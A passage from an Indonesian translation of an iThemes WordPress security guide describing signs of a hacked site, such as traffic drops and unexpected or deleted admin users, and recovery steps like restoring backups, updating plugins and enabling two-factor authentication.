Akhirnya, saya sadar mengapa saya tidak dapat melihat popup. Saya telah menginstal ekstensi adblocker di browser saya. Segera setelah saya menonaktifkan ekstensi pemblokir iklan, saya dapat melihat munculan di mana-mana. Saya membagikan kisah memalukan ini untuk menyelamatkan Anda dari kesalahan yang sama, semoga.

4. Anda Melihat Penurunan Lalu Lintas Situs Web

Jika Anda masuk ke akun Google Analytics Anda dan Anda melihat penurunan tajam dalam lalu lintas situs web, situs WordPress Anda dapat diretas. Penurunan lalu lintas situs layak untuk diselidiki. Mungkin ada skrip berbahaya di situs Anda yang mengalihkan pengunjung dari situs Anda atau Google mungkin sudah memasukkan situs web Anda ke daftar hitam sebagai situs jahat.

Hal pertama yang ingin Anda cari adalah lalu lintas keluar situs web Anda. Dengan melacak situs web Anda dengan Google Analytics, Anda perlu mengonfigurasi situs Anda untuk melacak lalu lintas yang meninggalkan situs Anda. Cara termudah untuk memantau lalu lintas keluar di situs WordPress Anda adalah dengan menggunakan plugin WordPress Google Analytics.

6. Pengguna Baru Tak Terduga

Jika situs web Anda memiliki pendaftaran pengguna admin baru yang tidak terduga, itu pertanda lain bahwa situs WordPress Anda telah diretas. Melalui eksploitasi pengguna yang disusupi, penyerang dapat membuat pengguna admin baru. Dengan hak istimewa admin baru mereka, peretas siap menyebabkan kerusakan besar pada situs Anda.

Ingat plugin Kepatuhan WP GDPR dari sebelumnya? Pada bulan November 2018, kami memiliki beberapa laporan tentang pengguna admin baru yang dibuat di situs web pelanggan. Peretas menggunakan kerentanan di plugin Kepatuhan WP GDPR (kerentanan ditambal di versi 1.4.3) untuk membuat pengguna admin baru di situs WordPress yang menjalankan plugin. Eksploitasi plugin memungkinkan pengguna yang tidak sah untuk mengubah pendaftaran pengguna untuk mengubah peran pengguna baru default dari pelanggan menjadi admin. Sayangnya, ini bukan satu-satunya kerentanan dan Anda tidak bisa begitu saja menghapus pengguna baru yang dibuat penyerang dan menambal plugin.

Jika Anda telah menginstal Kepatuhan WP GDPR dan WooCommerce, situs Anda mungkin telah disuntik dengan kode berbahaya. Penyerang dapat menggunakan penginstal latar belakang plugin WooCommerce untuk memasukkan penginstal pintu belakang ke dalam database. Jika situs Anda memiliki pintu belakang yang terpasang, Anda harus menghubungi spesialis perbaikan peretasan. Pilihan lain adalah menggunakan file cadangan untuk memutar kembali ke salinan situs web Anda sebelum pelanggaran menggunakan cadangan sebelumnya.

7. Pengguna Admin Dihapus

Jika Anda tidak dapat masuk ke situs WordPress Anda, bahkan setelah pengaturan ulang kata sandi, itu mungkin merupakan tanda infeksi yang serius.

Ketika repo Gentoo Github diretas, hal pertama yang dilakukan penyerang adalah menghapus semua pengguna admin. Jadi bagaimana peretas ini bisa masuk ke akun Github mereka? Kata sandi pengguna admin Gentoo ditemukan di situs lain. Saya menduga bahwa nama pengguna dan kata sandi ditemukan baik melalui pengikisan atau dump basis data.

Meskipun kata sandi admin untuk akun Github Gentoo mereka berbeda dari yang digunakan pada akun yang disusupi, itu sangat mirip. Jadi ini seperti saya menggunakan iAmAwesome2020 sebagai kata sandi di satu akun dan iAmAwesome2021 di situs lain. Jadi para peretas dapat mengetahui kata sandi dengan sedikit usaha. Seperti yang bisa kita lihat, Anda harus menggunakan kata sandi unik untuk setiap akun. Variasi sederhana dalam kata sandi Anda tidak cukup. Dengan menggunakan LastPass, Anda dapat membuat dan menyimpan kata sandi yang kuat dan unik dengan aman untuk setiap situs.

Bagaimana Kembali Dari Bencana

Jika Anda menduga telah terjadi pelanggaran, ada beberapa langkah cepat yang dapat Anda ambil untuk mengurangi kerusakan.

Kembalikan ke Cadangan Sebelumnya/Bersihkan Situs Anda

Cara paling pasti untuk membatalkan pelanggaran keamanan adalah dengan memulihkan situs Anda kembali ke versi sebelumnya, sebelum serangan. Itulah mengapa memiliki solusi cadangan WordPress yang komprehensif sangat penting. Sebaiknya gunakan BackupBuddy untuk menjadwalkan pencadangan agar berjalan secara otomatis sehingga Anda selalu memiliki cadangan.

Perhatikan bahwa memulihkan cadangan sebelumnya mungkin masih membuat situs Anda rentan terhadap pelanggaran yang sama, jadi penting juga untuk mengikuti langkah-langkah ini.

Perbarui Semua Plugin & Tema Kedaluwarsa Segera

Plugin atau tema yang rentan mungkin masih menjadi penyebabnya, jadi penting untuk SEGERA memperbarui semua plugin atau tema yang sudah ketinggalan zaman. Bahkan jika Anda mengembalikan ke versi bersih situs web Anda sebelumnya, kerentanan yang sama akan tetap ada dan dapat diretas lagi.

Anda mungkin juga ingin memeriksa apakah Anda tidak menjalankan plugin atau tema rentan yang masih tanpa tambalan dari pengembang. Anda harus segera menghapus plugin ini.

Aktifkan Otentikasi Dua Faktor

Jika Anda tidak menggunakan autentikasi dua faktor untuk mengamankan login admin, aktifkan segera. Lapisan keamanan tambahan ini akan membantu memastikan pengguna yang tidak sah tidak dapat meretas akun admin apa pun.

Cari Bantuan Untuk Penghapusan Malware Profesional

Pelanggaran keamanan WordPress terjadi di tingkat server (lebih dalam dari instalasi WordPress Anda), jadi Anda mungkin perlu menghubungi layanan penghapusan malware profesional. Kami merekomendasikan WeWatchYourWebsite untuk penghapusan malware profesional.

Penutup: Panduan Utama Keamanan WordPress

Dalam panduan keamanan WordPress ini, kami membahas BANYAK! Namun, dengan mengikuti tip dalam panduan ini, Anda akan memblokir hampir 100% serangan yang dilakukan di situs web Anda.

Plugin Keamanan WordPress Dapat Membantu Mengamankan Situs WordPress Anda

Dipasangkan dengan pengetahuan tentang topik keamanan WordPress dalam panduan ini, plugin keamanan WordPress dapat membantu mengamankan situs WordPress Anda. iThemes Security Pro, plugin keamanan WordPress kami, menawarkan 50+ cara untuk mengamankan dan melindungi situs web Anda dari kerentanan keamanan WordPress yang umum. Dengan WordPress, otentikasi dua faktor, perlindungan brute force, penegakan kata sandi yang kuat, dan banyak lagi, Anda dapat menambahkan lapisan keamanan ekstra ke situs web Anda.

Michael Moore

Setiap minggu, Michael menyusun Laporan Kerentanan WordPress untuk membantu menjaga situs Anda tetap aman. Sebagai Manajer Produk di iThemes, dia membantu kami terus meningkatkan jajaran produk iThemes. Dia kutu buku raksasa & suka belajar tentang semua hal teknologi, lama & baru. Anda dapat menemukan Michael bergaul dengan istri & putrinya, membaca atau mendengarkan musik saat tidak bekerja.